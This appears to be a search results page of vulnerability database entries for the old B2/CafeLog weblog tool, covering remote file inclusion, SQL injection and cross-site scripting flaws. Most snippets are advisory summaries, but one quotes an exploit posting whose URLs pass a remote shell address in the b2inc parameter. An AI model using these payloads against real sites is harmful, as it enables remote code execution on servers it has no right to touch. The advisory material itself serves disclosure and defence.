10 matches found
EUVD-2007-2285
Malware in sbrugna...
B2 Weblog and News Publishing Tool v0.6.1 >> RFI
+++++++ name & version :B2 Weblog and News Publishing Tool v0.6.1 vendor: cafelog.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit: http://victim/b2archives.php?b2inc=http://shell http://victim/b2categories.php?b2inc=http://shell http://victim/b2mail.php?b2inc=http://shell...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in B2 Weblog and News Publishing Tool 0.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the b2inc parameter to 1 b2archives.php, 2 b2categories.php, or 3 b2mail.php. NOTE: this may overlap CVE-2002-1466...
CVE-2007-2290
Multiple PHP remote file inclusion vulnerabilities in B2 Weblog and News Publishing Tool 0.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the b2inc parameter to 1 b2archives.php, 2 b2categories.php, or 3 b2mail.php. NOTE: this may overlap CVE-2002-1466...
CVE-2007-2290
CVE-2007-2290 affects B2 Weblog and News Publishing Tool 0.6.1. It describes multiple PHP remote file inclusion vulnerabilities that allow remote attackers to execute arbitrary PHP code by supplying a URL in the b2inc parameter to one of three scripts: b2archives.php, b2categories.php, or b2mail....
CVE-2007-2290
Multiple PHP remote file inclusion vulnerabilities in B2 Weblog and News Publishing Tool 0.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the b2inc parameter to 1 b2archives.php, 2 b2categories.php, or 3 b2mail.php. NOTE: this may overlap CVE-2002-1466...
CVE-2002-1466
CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...
CVE-2002-1465
SQL injection vulnerability in CafeLog b2 Weblog Tool allows remote attackers to execute arbitrary SQL code via the tablehosts variable...
CVE-2002-1465
The CVE-2002-1465 entry describes an SQL injection in CafeLog b2 Weblog Tool, exploitable remotely through the tablehosts parameter. The affected component is a web-based weblog tool; the underlying issue is improper input handling that allows arbitrary SQL execution. Impact is partial confidenti...
CVE-2002-1464
Cross-site scripting XSS vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable...